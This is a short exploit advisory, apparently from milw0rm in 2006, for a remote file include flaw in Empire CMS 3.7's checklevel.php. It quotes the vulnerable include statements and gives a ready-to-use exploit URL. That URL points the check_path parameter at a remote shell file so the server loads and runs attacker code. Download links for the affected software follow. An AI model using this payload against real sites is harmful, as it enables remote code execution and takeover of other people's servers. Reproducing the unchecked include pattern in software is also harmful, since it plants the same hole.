Empire CMS 3.7 checklevel.php Remote File Include Vulnerability.pdf

1 Empire CMS <=3.7 (checklevel.php) Remote File Include Vulnerability 2 Find by: Bob Linuson 3 4 # Code: 5 6 2 $includefile=$check_path."e/class/MemberLevel.php"; 7 3 include("$includefile"); 8 ..... 9 67 include($check_path."e/class/connect.php"); 10 68 include($check_path."e/class/db_sql.php"); 11 69 include($check_path."e/class/user.php"); 12 13 14 #Exploit: 15 16 http://www.site.com/e/class/checklevel.php?check_path=http://shell.txt? 17 18 19 #URL: 20 21 http://www.phome.net/tmp/ecms37/ 22 http://www.phome.net/tmp/ecms37/down.php?url=/tmp/ecms37/ecms3.7−free.rar& 23 english: 24 http://translate.google.com/translate?u=http%3A%2F%2Fwww.phome.net%2Ftmp%2Fecms37%2F&langpair=zh−CN%7Cen&hl=zh−CN&new window=1&ie=UTF−8&oe=UTF−8&prev=%2Flanguage_tools 25 26 # milw0rm.com [2006−08−22] Page 1/1 Empire CMS 3.7 checklevel.php Remote File Include Vulnerability Bob Linuson 08/22/2006